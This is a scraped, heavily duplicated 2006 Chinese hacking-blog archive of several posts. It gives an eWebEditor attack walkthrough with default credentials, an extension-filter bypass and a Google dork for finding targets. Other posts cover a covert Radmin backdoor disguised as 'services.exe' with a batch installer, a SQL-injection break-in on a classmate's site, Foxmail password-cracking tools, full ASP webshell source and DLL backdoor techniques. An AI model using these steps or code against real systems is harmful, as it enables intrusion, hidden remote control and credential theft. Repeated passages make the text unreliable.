sAllowExt = Replace(Replace(Replace(Replace(Replace(UCase(sAllowExt), "ASP", ""), "CER", ""), "ASA", ""), "CDX", ""), "HTR", "")
猛一看什麼都過濾了,但是我們只要在上傳類型中增加「aaspsp」,就可以直接上傳asp文件了。呵呵,是不是天才的想法?「aaspsp」過濾了「asp」字符後,反而變成了「asp」!順便告訴大家一個秘密,其實動網論壇7.0 sp2中也可以利用類似的方法繞過對擴展名的過濾。
3.上傳了asp文件後,卻發現該目錄沒有運行腳本的權限。
呵呵,真是好笨啊,上傳類型可以改,上傳路徑不是也可以修改的嗎?仔細看看圖四。
4.已經使用了第2點中的方法,但是asp類型還是無法上傳。
看來站長肯定是一個寫asp的高手,但是我們還有最後一招來對付他:看到圖三中的「遠程類型」了嗎?eWebEditor能夠設定自動保存遠程文件的類型,我們可以加入asp類型。但是如何才能讓遠程訪問的asp文件能夠以源碼形式保存呢?方法是很多的,最簡單的方法是將IIS中的「應用文件映射」中的「asp」刪除。
後記
根據自己的經驗,幾乎只要能進入eWebEditor的後台管理,基本上都可以獲得WebShell。在Google上搜索「ewebeditor.asp?id=」能夠看到長達十多頁的相關信息,我大致抽查了其中幾個,發現成功率約為50%。還不錯吧?oblg 2.52版以前的版本也是使用eWebEditor,可以去搜索幾個來練練手。要命的是eWebEditor的官方網站和幫助文件中根本沒有這方面的安全提示。還有,我發現官方提供的測試系統並不存在類似的漏洞,看來不是他們不知道,而是沒有把免費用戶的網絡安危放在心上!
漏洞利用
利用eWebEditor獲得WebShell的步驟大致如下:
1.確定網站使用了eWebEditor。一般來說,我們只要注意發表帖子(文章)的頁面是否有類似做了記號的圖標,就可以大致做出判斷了。
2.查看源代碼,找到eWebEditor的路徑。點擊「查看源代碼」,看看源碼中是否存在類似「」的語句。其實只有發現了存在這樣的語句了,才可以真正確定這個網站使用了eWebEditor。然後記下src=』***』中的「***」,這就是eWebEditor路徑。
3.訪問eWebEditor的管理登錄頁面。eWebEditor的默認管理頁面為admin_login.asp,和ewebeditor.asp在同一目錄下。以上面的路徑為例,我們訪問的地址為:http://www.***.net/edit/admin_login.asp,看看是否出現了登錄頁面。
如果沒有看到這樣的頁面,說明管理員已經刪除了管理登錄頁面,呵呵,還等什麼,走人啊,換個地方試試。不過一般來說,我很少看到有哪個管理員刪了這個頁面,試試默認的用戶名:admin,密碼:admin888。怎麼樣?成功了吧(不是默認賬戶請看後文)!
4.增加上傳文件類型。點擊「樣式管理」,隨便選擇列表中底下的某一個樣式的「設置,為什麼要選擇列表中底下的樣式?因為eWebEditor自帶的樣式是不允許修改的,當然你也可以拷貝一個新的樣式來設置。
然後在上傳的文件類型中增加「asa」類型。
5.上傳ASP木馬,獲得WebShell。接下來將ASP木馬的擴展名修改為asa,就可以簡單上傳你的ASP木馬了。不要問我怎麼上傳啊,看到 「預覽」 了嗎?點擊「預覽」,然後選擇「插入其它文件」的按鈕就可以了。
漏洞原理
漏洞的利用原理很簡單,請看Upload.asp文件:
任何情況下都不允許上傳asp腳本文件
sAllowExt = Replace(UCase(sAllowExt), "ASP", "")
因為eWebEditor僅僅過濾了ASP文件。記得我第一次使用eWebEditor時就在納悶:既然作者已經知道asp文件需要過濾,為什麼不同時過濾asa、cer等文件呢?也許這就是對免費用戶不負責任的表現吧!
高級應用
eWebEditor的漏洞利用還有一些技巧:
1.使用默認用戶名和密碼無法登錄。
請試試直接下載db目錄下的ewebeditor.mdb文件,用戶名和密碼在eWebEditor_System表中,經過了md5加密,如果無法下載或者無法破解,那就當自己的運氣不好了。
2.加了asa類型後發現還是無法上傳。
應該是站長懂點代碼,自己修改了Upload.asp文件,但是沒有關係,按照常人的思維習慣,往往會直接在sAllowExt = Replace(UCase(sAllowExt), "ASP", "")一句上修改,我就看見過一個站長是這樣修改的:
sAllowExt = Replace(Replace(Replace(Replace(Replace(UCase(sAllowExt), "ASP", ""), "CER", ""), "ASA", ""), "CDX", ""), "HTR", "")
猛一看什麼都過濾了,但是我們只要在上傳類型中增加「aaspsp」,就可以直接上傳asp文件了。呵呵,是不是天才的想法?「aaspsp」過濾了「asp」字符後,反而變成了「asp」!順便告訴大家一個秘密,其實動網論壇7.0 sp2中也可以利用類似的方法繞過對擴展名的過濾。
3.上傳了asp文件後,卻發現該目錄沒有運行腳本的權限。
呵呵,真是好笨啊,上傳類型可以改,上傳路徑不是也可以修改的嗎?仔細看看圖四。
4.已經使用了第2點中的方法,但是asp類型還是無法上傳。
看來站長肯定是一個寫asp的高手,但是我們還有最後一招來對付他:看到圖三中的「遠程類型」了嗎?eWebEditor能夠設定自動保存遠程文件的類型,我們可以加入asp類型。但是如何才能讓遠程訪問的asp文件能夠以源碼形式保存呢?方法是很多的,最簡單的方法是將IIS中的「應用文件映射」中的「asp」刪除。
後記
根據自己的經驗,幾乎只要能進入eWebEditor的後台管理,基本上都可以獲得WebShell。在Google上搜索「ewebeditor.asp?id=」能夠看到長達十多頁的相關信息,我大致抽查了其中幾個,發現成功率約為50%。還不錯吧?oblg 2.52版以前的版本也是使用eWebEditor,可以去搜索幾個來練練手。要命的是eWebEditor的官方網站和幫助文件中根本沒有這方面的安全提示。還有,我發現官方提供的測試系統並不存在類似的漏洞,看來不是他們不知道,而是沒有把免費用戶的網絡安危放在心上!
- Nov 26 Sun 2006 13:00
<Hackbase>Radmin終級安裝
問一些高手,都說用的radmin,一個很重要的原因就是它不被殺毒軟件查殺,而且速度非常快,界面也是簡潔美觀,可以說是高手的最愛,(什麼?沒聽說過?那就不用看了!)就是缺少一個反向連接的功能,但是對於我們控制服務器來說,反向連接也是多餘的,今天我給大家帶來一個radmin的智能化一鍵安裝成新的服務或者替換成系統已有的服務,這樣做的好處當然是誰都知道--進程不會被簡單地kill掉,而且不用擔心開機自啟動的問題。好,廢話不多說,現在就來開工。
首先配置服務端,很簡單的幾個設置,這裡我用的是影子漢化版3.2,隱藏任務欄圖標是肯定的了,改端口為2046(這個電影我至今看不懂,所以就用它了),如圖一
好了,這樣就生成了r_server這個服務端,雙擊執行這裡是沒有效果的,不信你可以試試,我們需要在命令行下把它安裝成服務,但是它默認的服務名稱和顯示名稱分別是r_server和remote administrator service並且沒有服務的描述,雙擊服務會看到進程所在的路徑,如圖二,三
同時在任務管理器下radmin的進程r_server會顯得很刺眼。
思路是這樣的,用rar的自解壓包將radmin的相關文件解壓到系統目錄,然後用批處理將radmin安裝成服務,並且改名,最後刪掉痕跡,是不是很爽啊!
Radmin的服務安裝在註冊表中有2個地方,分別在[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]和[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\r_server]
再如圖四把radmin改名為一個系統進程名,我這裡用的是services,因為服務名將來也要顯示在進程中的,所以起個和系統進程名一樣的名字,只是真正的services在system32目錄下,我換個目錄,在system32\WBEM\。radmin運行需要raddrv.dll和admdll.dll這兩個動態鏈接庫的支持,sc用來改服務描述名,2.bat 就是批處理了。我們將這五個文件做成一個自解壓包,並讓它自解壓到%systemroot%\system32\WBEM目錄下,%systemroot%顧名思義是系統目錄,用來適應不同的操作系統,然後在高級自解壓選項裡的常規選項卡的解壓後運行中填上主角批處理文件,如圖五
在模式選項卡的安靜模式選全部隱藏,覆蓋方式選擇覆蓋所有文件,如圖六
圖標可以自己改一個,我就不說了。
再來說批處理,在radmin的配置界面安裝服務,然後將[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]主鍵導出,接著把它用批處理命令寫入server.reg這個自己建立的註冊表文件中,注意關閉回顯。這之前先把services註冊成服務,注意選擇安靜模式,這樣註冊的問題在於沒有了[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]主鍵的配置信息,所以我們才要後來補上。
@echo off
@services.exe /install /silence
echo Windows Registry Editor Version 5.00 > c:\server.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]>> c:\server.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]>> c:\server.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]>> c:\server.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist]>> c:\server.reg
首先配置服務端,很簡單的幾個設置,這裡我用的是影子漢化版3.2,隱藏任務欄圖標是肯定的了,改端口為2046(這個電影我至今看不懂,所以就用它了),如圖一
好了,這樣就生成了r_server這個服務端,雙擊執行這裡是沒有效果的,不信你可以試試,我們需要在命令行下把它安裝成服務,但是它默認的服務名稱和顯示名稱分別是r_server和remote administrator service並且沒有服務的描述,雙擊服務會看到進程所在的路徑,如圖二,三
同時在任務管理器下radmin的進程r_server會顯得很刺眼。
思路是這樣的,用rar的自解壓包將radmin的相關文件解壓到系統目錄,然後用批處理將radmin安裝成服務,並且改名,最後刪掉痕跡,是不是很爽啊!
Radmin的服務安裝在註冊表中有2個地方,分別在[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]和[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\r_server]
再如圖四把radmin改名為一個系統進程名,我這裡用的是services,因為服務名將來也要顯示在進程中的,所以起個和系統進程名一樣的名字,只是真正的services在system32目錄下,我換個目錄,在system32\WBEM\。radmin運行需要raddrv.dll和admdll.dll這兩個動態鏈接庫的支持,sc用來改服務描述名,2.bat 就是批處理了。我們將這五個文件做成一個自解壓包,並讓它自解壓到%systemroot%\system32\WBEM目錄下,%systemroot%顧名思義是系統目錄,用來適應不同的操作系統,然後在高級自解壓選項裡的常規選項卡的解壓後運行中填上主角批處理文件,如圖五
在模式選項卡的安靜模式選全部隱藏,覆蓋方式選擇覆蓋所有文件,如圖六
圖標可以自己改一個,我就不說了。
再來說批處理,在radmin的配置界面安裝服務,然後將[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]主鍵導出,接著把它用批處理命令寫入server.reg這個自己建立的註冊表文件中,注意關閉回顯。這之前先把services註冊成服務,注意選擇安靜模式,這樣註冊的問題在於沒有了[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]主鍵的配置信息,所以我們才要後來補上。
@echo off
@services.exe /install /silence
echo Windows Registry Editor Version 5.00 > c:\server.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]>> c:\server.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]>> c:\server.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]>> c:\server.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist]>> c:\server.reg
- Nov 26 Sun 2006 12:11
<Hackbase>輕鬆入侵個人免費空間
昨天晚上剛寫完代碼在學校的QQ群裡透透氣,正好遇到學校的幾個計算機狂熱份子在裡面闊談網站建議。剛進去打個招呼,就被幾個寒氣避人的傢伙冒了幾句:「你們ncph最近很牛噠,有本事把我網站黑了----http://***.f78.net」哎,完全挑釁啊,恰好一美女在群裡面也叫到:「師傅,給他黑了。。。」哎,什麼時候又成她師傅了,沒辦法,衝著美女這句話回了一句:「我看看。」(我心裡也沒什麼底)
接下來便開始分析他的網站,還好,不是全靜態的頁面,冒了一滴汗。當然先看看有沒有注入漏洞了。在幾個帶參數的網址鏈接後面加了個』號,沒反應,難道真的沒注入?這個站應該不是他自己寫的,是從網站上下源碼拼來的吧,我們看看他的結構。如圖1:
便找到了他的後台,http://***.f78.net/login.asp,試了一下」or」」=」、」or」=」or」、admin、admin888進行登錄,當然得先碰碰運行,看來運氣不好,失敗,並且全是點擊「登錄」後找不到頁面,有可能他的後台根本就登不進去。
再靜下心來看一下這個網站,網站名字為「xxx在線」,但上面還有他的個人介紹,夠詳細的。我們看下圖2:
連個人姓名、年齡、郵箱、手機、QQ等在網站上全可以找到,哎,太張揚了吧,網站做得並不怎麼樣,還是一個二級域名。
瞭解了一下網站的基本信息,總還得動手幹啊,還是拿工具掃掃看。拿出明小子旁注3.5,測試是否有上傳漏洞,默認數據庫得,當然,旁注3.5里面許多上傳漏洞存在頁面的文件還有默認數據庫等,得自己添加一些新的,我自認為這軟件靈活性還可以。檢查上傳漏洞和默認數據庫等都沒戲,這個也正常,不然人家憑什麼挑釁。
再仔細查找一下注入點,用旁注軟件批量注入測試一下,同樣沒有什麼信息。接下來只有再看看他的站了,這麼大個站,拼湊了這麼多的源代碼沒一點破綻?不放棄是我的性格。
還好,有一個投票系統,也是用的別人的,老天對我不薄,我們判斷一下,如圖3:
再試一下」and 1=1」 返回正常,」and 1=2」,出錯,好的,有戲了,我們拿注入工具猜解一下,還是用明小子旁注3.5吧。
結果如圖4:
看到了,得到一個密碼,一陣歡喜,去後台登錄一下看。鬱悶,輸入用戶名:」admin」、密碼:「49420072」,點擊登錄,仍然找不到頁面。咋回事,隨便輸幾個點擊登錄還是找不到頁面。看來他的這個後台是不能登錄的(後來確實經他證實,為了防止我的攻擊,他已經改了後台代碼,不能登錄的!)。
也許到了這一步我們真的是無計可施了吧,我仍對自己說不要輕易放棄,體息了一分鐘,靜下來再想了一下。
既然網站程序已經無計可施,我們再從其它地方著手吧。當然大家都比較當用旁注吧,我看了一下,和他一個服務器的就一個國際域名:http://www.f78.net,他是在這個域名下劃分的一個二級域名。那麼我們打開這個域名看一下,如圖5:
接下來便開始分析他的網站,還好,不是全靜態的頁面,冒了一滴汗。當然先看看有沒有注入漏洞了。在幾個帶參數的網址鏈接後面加了個』號,沒反應,難道真的沒注入?這個站應該不是他自己寫的,是從網站上下源碼拼來的吧,我們看看他的結構。如圖1:
便找到了他的後台,http://***.f78.net/login.asp,試了一下」or」」=」、」or」=」or」、admin、admin888進行登錄,當然得先碰碰運行,看來運氣不好,失敗,並且全是點擊「登錄」後找不到頁面,有可能他的後台根本就登不進去。
再靜下心來看一下這個網站,網站名字為「xxx在線」,但上面還有他的個人介紹,夠詳細的。我們看下圖2:
連個人姓名、年齡、郵箱、手機、QQ等在網站上全可以找到,哎,太張揚了吧,網站做得並不怎麼樣,還是一個二級域名。
瞭解了一下網站的基本信息,總還得動手幹啊,還是拿工具掃掃看。拿出明小子旁注3.5,測試是否有上傳漏洞,默認數據庫得,當然,旁注3.5里面許多上傳漏洞存在頁面的文件還有默認數據庫等,得自己添加一些新的,我自認為這軟件靈活性還可以。檢查上傳漏洞和默認數據庫等都沒戲,這個也正常,不然人家憑什麼挑釁。
再仔細查找一下注入點,用旁注軟件批量注入測試一下,同樣沒有什麼信息。接下來只有再看看他的站了,這麼大個站,拼湊了這麼多的源代碼沒一點破綻?不放棄是我的性格。
還好,有一個投票系統,也是用的別人的,老天對我不薄,我們判斷一下,如圖3:
再試一下」and 1=1」 返回正常,」and 1=2」,出錯,好的,有戲了,我們拿注入工具猜解一下,還是用明小子旁注3.5吧。
結果如圖4:
看到了,得到一個密碼,一陣歡喜,去後台登錄一下看。鬱悶,輸入用戶名:」admin」、密碼:「49420072」,點擊登錄,仍然找不到頁面。咋回事,隨便輸幾個點擊登錄還是找不到頁面。看來他的這個後台是不能登錄的(後來確實經他證實,為了防止我的攻擊,他已經改了後台代碼,不能登錄的!)。
也許到了這一步我們真的是無計可施了吧,我仍對自己說不要輕易放棄,體息了一分鐘,靜下來再想了一下。
既然網站程序已經無計可施,我們再從其它地方著手吧。當然大家都比較當用旁注吧,我看了一下,和他一個服務器的就一個國際域名:http://www.f78.net,他是在這個域名下劃分的一個二級域名。那麼我們打開這個域名看一下,如圖5:
- Nov 26 Sun 2006 12:00
<Hackbase>用工具破解Foxmail的密碼
Foxmail在國內擁有大量用戶,由於種種原因,很多用戶需要把Foxmail裡面的電子郵件、郵箱賬號設置等轉移到其他 E-mail 軟件中,或者忘記了賬戶密碼、郵箱密碼而把自己鎖在門外。然而由於foxmail糟糕的安全性能,我們完全不必為此擔憂!下面我為大家介紹幾種破解Foxmail賬號或者打開加密賬號郵件的常用方法:
友情提示:一把刀可以拿來切西瓜解渴也可以用來殺人越貨,我很不希望以下方法被用於滿足某些人不好的慾望,真心希望各位潔身自好!
手段一
月影Foxmail郵件轉換/密碼恢復器
有效範圍:Foxmail5及以前版本
推薦指數:★★★★★
危害指數:★★★★★
主要功能:
自動轉換Foxmail所有郵箱中的全部電子郵件,自動批量導出為eml文件,方便您導入到其他 E-mail 軟件中。
自動提取所有往來電子郵件中的聯繫人信息,生成聯繫人郵件列表。
自動恢復Foxmail多用戶賬戶密碼,以後再也不會把自己鎖在門外了。
自動恢復Foxmail中所有郵箱設置,包含「其他POP3」中的所有郵箱信息。恢復的信息包括:郵箱名稱、郵箱賬號、郵箱密碼、郵箱POP3服務器地址。
簡單明瞭的操作,只要選擇Foxmail所在目錄即可全自動進行恢復。
本程序只是將您忘記了的信息顯示出來,整個過程不會在Foxmail目錄中寫入任何信息,不會改動任何文件。
純綠色軟件,不用安裝,雙擊就能運行,刪除就是卸載。
鄭重警告:切勿用於非法用途,否則一切後果自負!
手段二
FoxMail.6.0b1.Account.Password.Hacker
有效範圍:Foxmail6
推薦指數:★★★★★
危害指數:★★★★☆
由於Foxmail6.0的普及率還不是太高,危害不如月影。不過後勁十足,值得警惕!
手段三
Foxmail(所有常用版本)
有效範圍:Foxmail所有常用版本
推薦指數:★★★★★
危害指數:★★★★
通過工具欄的「郵箱」-「導入」-「Foxmail郵件夾」功能可以將任何賬戶下的指定郵件夾當中的郵件全部導入到當前賬戶下來,無論該郵件夾或者賬戶是否加密。不過這種方法暫時無法得到保存在賬戶當中的郵箱密碼,危險性稍小。
手段四
Foxmail的Account.stg安全漏洞
有效範圍:Foxmail所有常用版本
推薦指數:★★★★★
危害指數:★★★★
友情提示:一把刀可以拿來切西瓜解渴也可以用來殺人越貨,我很不希望以下方法被用於滿足某些人不好的慾望,真心希望各位潔身自好!
手段一
月影Foxmail郵件轉換/密碼恢復器
有效範圍:Foxmail5及以前版本
推薦指數:★★★★★
危害指數:★★★★★
主要功能:
自動轉換Foxmail所有郵箱中的全部電子郵件,自動批量導出為eml文件,方便您導入到其他 E-mail 軟件中。
自動提取所有往來電子郵件中的聯繫人信息,生成聯繫人郵件列表。
自動恢復Foxmail多用戶賬戶密碼,以後再也不會把自己鎖在門外了。
自動恢復Foxmail中所有郵箱設置,包含「其他POP3」中的所有郵箱信息。恢復的信息包括:郵箱名稱、郵箱賬號、郵箱密碼、郵箱POP3服務器地址。
簡單明瞭的操作,只要選擇Foxmail所在目錄即可全自動進行恢復。
本程序只是將您忘記了的信息顯示出來,整個過程不會在Foxmail目錄中寫入任何信息,不會改動任何文件。
純綠色軟件,不用安裝,雙擊就能運行,刪除就是卸載。
鄭重警告:切勿用於非法用途,否則一切後果自負!
手段二
FoxMail.6.0b1.Account.Password.Hacker
有效範圍:Foxmail6
推薦指數:★★★★★
危害指數:★★★★☆
由於Foxmail6.0的普及率還不是太高,危害不如月影。不過後勁十足,值得警惕!
手段三
Foxmail(所有常用版本)
有效範圍:Foxmail所有常用版本
推薦指數:★★★★★
危害指數:★★★★
通過工具欄的「郵箱」-「導入」-「Foxmail郵件夾」功能可以將任何賬戶下的指定郵件夾當中的郵件全部導入到當前賬戶下來,無論該郵件夾或者賬戶是否加密。不過這種方法暫時無法得到保存在賬戶當中的郵箱密碼,危險性稍小。
手段四
Foxmail的Account.stg安全漏洞
有效範圍:Foxmail所有常用版本
推薦指數:★★★★★
危害指數:★★★★
- Nov 26 Sun 2006 11:52
<Hackbase>兩種比較典型的ASP木馬防範方法
隨著ASP 技術的發展,網絡上基於ASP技術開發的網站越來越多,對ASP技術的支持可以說已經是windows系統IIS服務器的一項基本功能。但是基於ASP技術的木馬後門,也越來越多,而且功能也越來越強大。由於ASP它本身是服務器提供的一貢服務功能,所以這種ASP腳本的木馬後門,不會被殺毒軟件查殺。被黑客們稱為「永遠不會被查殺的後門」。由於其高度的隱蔽性和難查殺性,對網站的安全造成了嚴重的威脅。因此針對ASP木馬的防範和清除,為我們的網管人員提出了更高的技術要求。下面我結合個人的經驗,談一下對兩款比較典型的ASP 木馬的防範方法,希望對大家能夠有所幫助。
以下是第一款木馬的代碼:
<title>ASP Shell</title>
<%@ Language=vbscript %>
<%
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
-- create the COM objects that we will be using --
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
-- check for a command that we have posted --
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
-- Use a poor mans pipe ... a temp file --
szTempFile = "C:" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="執行命令">
</FORM>
<PRE><%
If (IsObject(oFile)) Then
-- Read the output from our command and remove the temp file --
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>
在命令行裡輸入DIR命令點執行就可以查看目錄了!!它可以使用各種DOS命令,如:copy、net、netstat等。
但是它的默認執行權限只有GUEST,也就是IUSR_COMPUTER用戶的執行權限。當然如果你把IUSR_COMPUTER用戶加入管理員組,那麼你就有管理員權限了。這一款木馬的特點是,使用很方便。幾乎就想當於DOS命令行窗口xx作一樣。但是如果服務器限制了FSO(無組件上傳),那麼它是沒有辦法使用了。還有就是在服務器以後增加的虛擬主機裡也沒有辦法使用。只能在「默認 Web 站點」裡使用,所以它相對的適用範圍較窄。
以下是第一款木馬的代碼:
<title>ASP Shell</title>
<%@ Language=vbscript %>
<%
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
-- create the COM objects that we will be using --
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
-- check for a command that we have posted --
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
-- Use a poor mans pipe ... a temp file --
szTempFile = "C:" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="執行命令">
</FORM>
<PRE><%
If (IsObject(oFile)) Then
-- Read the output from our command and remove the temp file --
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>
在命令行裡輸入DIR命令點執行就可以查看目錄了!!它可以使用各種DOS命令,如:copy、net、netstat等。
但是它的默認執行權限只有GUEST,也就是IUSR_COMPUTER用戶的執行權限。當然如果你把IUSR_COMPUTER用戶加入管理員組,那麼你就有管理員權限了。這一款木馬的特點是,使用很方便。幾乎就想當於DOS命令行窗口xx作一樣。但是如果服務器限制了FSO(無組件上傳),那麼它是沒有辦法使用了。還有就是在服務器以後增加的虛擬主機裡也沒有辦法使用。只能在「默認 Web 站點」裡使用,所以它相對的適用範圍較窄。
- Nov 26 Sun 2006 11:45
<Hackbase>DLL後門完全清除方法
前言
後門!相信這個詞語對您來說一定不會陌生,它的危害不然而欲,但隨著人們的安全意識逐步增強,又加上殺毒軟件的"大力支持",使傳統的後門無法在隱藏自己,任何稍微有點計算機知識的人,都知道"查端口""看進程",以便發現一些"蛛絲馬跡"。所以,後門的編寫者及時調整了思路,把目光放到了動態鏈接程序庫上,也就是說,把後門做成DLL文件,然後由某一個EXE做為載體,或者使用Rundll32.exe來啟動,這樣就不會有進程,不開端口等特點,也就實現了進程、端口的隱藏。本文以"DLL的原理""DLL的清除""DLL的防範"為主題,並展開論述,旨在能讓大家對DLL後門"快速上手",不在恐懼DLL後門。好了,進入我們的主題。
一、DLL的原理
1,動態鏈接程序庫
動態鏈接程序庫,全稱:Dynamic Link Library,簡稱:DLL,作用在於為應用程序提供擴展功能。應用程序想要調用DLL文件,需要跟其進行"動態鏈接";從編程的角度,應用程序需要知道DLL文件導出的API函數方可調用。由此可見,DLL文件本身並不可以運行,需要應用程序調用。正因為DLL文件運行時必須插入到應用程序的內存模塊當中,這就說明了:DLL文件無法刪除。這是由於Windows內部機製造成的:正在運行的程序不能關閉。所以,DLL後門由此而生!
2,DLL後門原理及特點
把一個實現了後門功能的代碼寫成一個DLL文件,然後插入到一個EXE文件當中,使其可以執行,這樣就不需要佔用進程,也就沒有相對應的PID號,也就可以在任務管理器中隱藏。DLL文件本身和EXE文件相差不大,但必須使用程序(EXE)調用才能執行DLL文件。DLL文件的執行,需要EXE文件加載,但EXE想要加載DLL文件,需要知道一個DLL文件的入口函數(既DLL文件的導出函數),所以,根據DLL文件的編寫標準:EXE必須執行DLL文件中的DLLMain()作為加載的條件(如同EXE的mian())。做DLL後門基本分為兩種:1)把所有功能都在DLL文件中實現;2)把DLL做成一個啟動文件,在需要的時候啟動一個普通的EXE後門。
常見的編寫方法:
(1),只有一個DLL文件
這類後門很簡單,只把自己做成一個DLL文件,在註冊表Run鍵值或其他可以被系統自動加載的地方,使用Rundll32.exe來自動啟動。Rundll32.exe是什麼?顧名思意,"執行32位的DLL文件"。它的作用是執行DLL文件中的內部函數,這樣在進程當中,只會有Rundll32.exe,而不會有DLL後門的進程,這樣,就實現了進程上的隱藏。如果看到系統中有多個Rundll32.exe,不必驚慌,這證明用Rundll32.exe啟動了多少個的DLL文件。當然,這些Rundll32.exe執行的DLL文件是什麼,我們都可以從系統自動加載的地方找到。
現在,我來介紹一下Rundll32.exe這個文件,意思上邊已經說過,功能就是以命令行的方式調用動態鏈接程序庫。系統中還有一個Rundll.exe文件,他的意思是"執行16位的DLL文件",這裡要注意一下。在來看看Rundll32.exe使用的函數原型:
其命令行下的使用方法為:Rundll32.exe DLLname,Functionname [Arguments]
Void CALLBACK FunctionName (
HWND hwnd,
HINSTANCE hinst,
LPTSTR lpCmdLine,
Int nCmdShow
);
DLLname為需要執行的DLL文件名;Functionname為前邊需要執行的DLL文件的具體引出函數;[Arguments]為引出函數的具體參數。
(2),替換系統中的DLL文件
這類後門就比上邊的先進了一些,它把實現了後門功能的代碼做成一個和系統匹配的DLL文件,並把原來的DLL文件改名。遇到應用程序請求原來的DLL文件時, DLL後門就啟一個轉發的作用,把"參數"傳遞給原來的DLL文件;如果遇到特殊的請求時(比如客戶端),DLL後門就開始,啟動並運行了。對於這類後門,把所有操作都在DLL文件中實現最為安全,但需要的編程知識也非常多,也非常不容易編寫。所以,這類後門一般都是把DLL文件做成一個"啟動"文件,在遇到特殊的情況下(比如客戶端的請求),就啟動一個普通的EXE後門;在客戶端結束連接之後,把EXE後門停止,然後DLL文件進入"休息"狀態,在下次客戶端連接之前,都不會啟動。但隨著微軟的"數字簽名"和"文件恢復"的功能出台,這種後門已經逐步衰落。
提示:
在WINNT\system32目錄下,有一個dllcache文件夾,裡邊存放著眾多DLL文件(也包括一些重要的EXE文件),在DLL文件被非法修改之後,系統就從這裡來恢復被修改的DLL文件。如果要修改某個DLL文件,首先應該把dllcache目錄下的同名DLL文件刪除或更名,否則系統會自動恢復。
(3),動態嵌入式
這才是DLL後門最常用的方法。其意義是將DLL文件嵌入到正在運行的系統進程當中。在Windows系統中,每個進程都有自己的私有內存空間,但還是有種種方法來進入其進程的私有內存空間,來實現動態嵌入式。由於系統的關鍵進程是不能終止的,所以這類後門非常隱蔽,查殺也非常困難。常見的動態嵌入式有:"掛接API""全局鉤子(HOOK)""遠程線程"等。
後門!相信這個詞語對您來說一定不會陌生,它的危害不然而欲,但隨著人們的安全意識逐步增強,又加上殺毒軟件的"大力支持",使傳統的後門無法在隱藏自己,任何稍微有點計算機知識的人,都知道"查端口""看進程",以便發現一些"蛛絲馬跡"。所以,後門的編寫者及時調整了思路,把目光放到了動態鏈接程序庫上,也就是說,把後門做成DLL文件,然後由某一個EXE做為載體,或者使用Rundll32.exe來啟動,這樣就不會有進程,不開端口等特點,也就實現了進程、端口的隱藏。本文以"DLL的原理""DLL的清除""DLL的防範"為主題,並展開論述,旨在能讓大家對DLL後門"快速上手",不在恐懼DLL後門。好了,進入我們的主題。
一、DLL的原理
1,動態鏈接程序庫
動態鏈接程序庫,全稱:Dynamic Link Library,簡稱:DLL,作用在於為應用程序提供擴展功能。應用程序想要調用DLL文件,需要跟其進行"動態鏈接";從編程的角度,應用程序需要知道DLL文件導出的API函數方可調用。由此可見,DLL文件本身並不可以運行,需要應用程序調用。正因為DLL文件運行時必須插入到應用程序的內存模塊當中,這就說明了:DLL文件無法刪除。這是由於Windows內部機製造成的:正在運行的程序不能關閉。所以,DLL後門由此而生!
2,DLL後門原理及特點
把一個實現了後門功能的代碼寫成一個DLL文件,然後插入到一個EXE文件當中,使其可以執行,這樣就不需要佔用進程,也就沒有相對應的PID號,也就可以在任務管理器中隱藏。DLL文件本身和EXE文件相差不大,但必須使用程序(EXE)調用才能執行DLL文件。DLL文件的執行,需要EXE文件加載,但EXE想要加載DLL文件,需要知道一個DLL文件的入口函數(既DLL文件的導出函數),所以,根據DLL文件的編寫標準:EXE必須執行DLL文件中的DLLMain()作為加載的條件(如同EXE的mian())。做DLL後門基本分為兩種:1)把所有功能都在DLL文件中實現;2)把DLL做成一個啟動文件,在需要的時候啟動一個普通的EXE後門。
常見的編寫方法:
(1),只有一個DLL文件
